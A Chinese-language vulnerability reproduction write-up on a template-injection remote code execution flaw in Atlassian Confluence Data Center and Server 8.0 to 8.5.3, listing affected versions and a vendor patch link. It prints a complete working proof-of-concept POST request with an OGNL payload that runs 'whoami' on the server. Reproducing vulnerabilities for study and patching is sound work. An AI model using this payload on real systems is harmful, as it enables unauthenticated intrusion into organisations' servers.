0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。

Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。

0x02影响版本

Confluence Data Center and Server 8.0.x 

Confluence Data Center and Server 8.1.x 

Confluence Data Center and Server 8.2.x 

Confluence Data Center and Server 8.3.x 

Confluence Data Center and Server 8.4.x 

8.5.0 <= Confluence Data Center and Server <= 8.5.3

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

漏洞复现

POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 286
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('Cmd-Ret',(new+freemarker.template.utility.Execute()).exec({"whoami"}))

测试whoami(漏洞存在)

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615